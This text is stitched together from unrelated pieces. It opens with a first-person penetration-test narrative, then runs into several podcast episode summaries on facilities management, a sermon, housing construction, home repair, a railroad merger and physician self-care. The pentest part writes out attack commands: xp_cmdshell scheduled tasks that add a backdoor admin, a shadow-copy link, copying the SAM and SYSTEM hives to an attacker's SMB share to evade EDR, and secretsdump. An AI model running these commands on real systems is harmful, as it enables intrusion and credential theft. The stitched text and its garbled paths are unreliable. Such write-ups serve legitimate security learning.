Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICEMSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITYSYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Vaughn Halliday, MSc, CFM, SFP, FMP, PMP, ProFM is Manager of Support Services and Facilities for the Central Bank of Trinidad & Tobago where he is a seasoned management executive with a specialized focus on facilities and project management, underpinned by a fervent commitment to sustainability. Mike Petrusky asks Vaughn why he believes that FM professionals need to lead with purpose, adapt with precision, and invest in people as much as they do in technology. They discuss the constant tension between short-term operational demands and long-term asset stewardship which often leads to deferred maintenance and reactive decision-making and Vaughn shares how the effective use of data from CMMS and BMS platforms is essential for driving strategic outcomes. He says that facility managers should move beyond a maintenance mindset and embrace FM as a strategic enabler of business outcomes by investing in training and credential programs at events like IFMA's World Workplace. The future of FM is already here, with AI, IoT, and smart systems reshaping how assets are managed, so Mike and Vaughn encourage and inspire you to be an Asset Champion in your organization! Drawing from the dedication of the Tabernacle in Numbers chapter 7, Pastor Dorrell examines the timeless principle that anything of value requires ongoing maintenance and investment. Just as the leaders of Israel brought offerings to provide for the place of worship, so too must the church be sustained by the continuous, shared participation of its people. Pastor Dorrell explains that this provision extends beyond finances to include our presence, our service, and a thoughtful, joyful attitude. This message explores how our collective investment in the spiritual life of the community creates an environment where God's presence is pleased to dwell.Eastland is a Place to BelongEastland Baptist Church is located in Tulsa, Oklahoma. Why are nearly all American homes built out of wood when most of the world uses brick, steel, or concrete? In Part I of our conversation Architect Jeana Ripple, author of The Type V City, explains how the U.S.'s reliance on light wood framing—known as Type V construction—became the national default. She breaks down the benefits (affordability, flexibility, sustainability) and the hidden risks (mold, storm damage, limited adaptability) that slowly shape the country's homes, neighborhoods, cities, and built environment. This conversation reveals how building codes and materials influence urban life far more than most of us realize.Jeana Ripple is the Chair of the Department of Architecture and the Vincent and Eleanor Shea Professor at the University of Virginia. Fix it before it breaks. That simple idea sets the basis for maintenance management and makes the difference between a manufacturing facility that's constantly putting out fires and one that runs like clockwork. Preventive maintenance isn't rocket science, but it does require changing how we think about equipment care and maintenance activities. SHOW NOTES: Welcome back to The Money Pit, your ultimate guide to turning your house into a home! We've been busy laboring away so you can have the home of your dreams, answering your how-to questions and diving into smart seasonal transitions to get yourself ready for fall. Here are some of the main points and caller questions covered this hour: - Furnaces and Fireplaces: It's crucial to prepare your home for cooler temperatures, which includes maintaining your furnace and fireplace by changing filters, scheduling professional tune-ups, and ensuring fireplace safety and carbon monoxide detectors are operational. - Floor Surface Protection: It's important to deep clean and protect wood, tile, and stone floors before they face the wear and tear of muddy boots and wet paws. Get tips for sealing stone, silencing squeaks, and tackling loose tiles. - HVAC Filters: A small but impactful task is changing your HVAC air filter every 30 to 90 days (or more often with pets/allergies) to improve indoor air quality, lower energy bills, and prevent costly breakdowns. Q & A: - Laura in Connecticut called about strengthening the kitchen floor in her 100-plus-year-old house to support a new appliance where a beam is missing. We suggest adding a girder to provide a neutral base and prevent decay. - Dennis in Florida inquired about using Trex composite decking for a lake dock, despite his contractor's reservations. We affirm that Trex and other composite decking are excellent, durable choices, cautioning only that they can get hot in direct sunlight. - Heather in California was concerned about her 1937 home's crumbling foundation, damaged by water, and the high quotes she received for replacement. We strongly advise her to seek an independent structural engineer's assessment to avoid conflicts of interest and ensure the recommended repairs are truly necessary. - Mike called regarding recurring pinhole leaks in his 36-year-old home's copper plumbing. We recommend immediately repairing the leaking sections and nearby areas of the pipe to address the immediate issue and prevent further damage. - Jim discussed mold growth in his attic after adding insulation. Inadequate ventilation combined with insulation can trap moisture, leading to condensation and mold. He should increase attic ventilation and treat the mold with a bleach solution. - Martin asked about installing engineered wood flooring, specifically the choice between glue-down and floating methods, and the use of underlayment. We recommend floating floors as the best modern option due to their ability to expand and contract, and advise consulting the flooring manufacturer for the ideal underlayment product. Railroad workers are sounding the alarm about the potentially catastrophic consequences of the proposed mega-merger of two of the nation's Class 1 freight rail companies. “Union Pacific said it would buy smaller rival Norfolk Southern in an $85-billion deal to create the country's first coast-to-coast freight rail operator,” Reuters reported in July. “If approved, the deal would be the largest-ever buyout in the sector.” If this giant merger goes through, what will it mean for railroad workers, customers, and for the general public? In this episode of Working People, we speak with a panel of six veteran railroaders and members of Railroad Workers United to get a workers' eye view of the proposed mega-merger and what it will mean for rail labor, the US supply chain, and for the public writ large. Speakers: Ron Kaminkow is a member of Railroad Workers United, currently serving as a trustee, and he is also a member of the Brotherhood of Locomotive Engineers and Trainmen (BLET), Division 51 in Reno, Nevada. Kaminkow recently retired from Amtrak; prior to working in passenger rail, he worked on the freight rail system for Norfolk Southern and Conrail. Jeff Kurtz was a railroad engineer and union member for 40 years and is a member of Railroad Workers United. He served as a union officer most of his career, including eight years as president of BLET Local 391 and chairman of the BLET Iowa State Legislative Board, where he oversaw safety and legislative matters for the union in the state for four railroads for 10 years. He retired in 2014 and served as state representative for one term in the Iowa House after winning the 2018 election in his House district. Derek Masters is a member of Railroad Workers United and works as a conductor for a major Class 1 railroad, primarily in the Northeast. He is a member of SMART Transportation Division (SMART-TD). Matt Parker is a member of Railroad Workers United who works as a rank-and-file locomotive engineer, based in Nevada, with over 20 years of experience. Matt Weaver is a founding member of Railroad Workers United and has been a member of the Brotherhood of Maintenance of Way Employees (Teamsters) for 30 years. He serves as the BMWED legislative director for the state of Ohio. Nick Wurst currently serves as general secretary of Railroad Workers United who works as a freight conductor and locomotive engineer, based in Massachusetts. Wurst started working for the railroad in 2019 as an intermodal worker and member of the Transportation Communication Union (TCU/IAM) and is currently a member of SMART-TD. Board-certified pediatrician and certified coach Jessie Mahoney discusses her article, "Why self-care must become medicine's new standard." She challenges the long-held belief in medical culture that self-sacrifice is noble and that self-care is an indulgence. Jessie argues that caring for oneself is not a luxury but a responsible, non-negotiable standard of care for anyone in medicine. She explains that a physician's energy is their most critical resource, and its chronic depletion leads to poor decisions, burnout, and negative ripple effects. To change this, she introduces a powerful new framework: viewing self-care not as an emergency "oxygen mask" for when things go wrong, but as the "required maintenance" that happens between flights to prevent accidents. This shift redefines rest and replenishment as foundational to safe, effective, and sustainable patient care—as essential as a surgical time-out—and calls on the culture of medicine to make time for it as an expectation, not an afterthought.
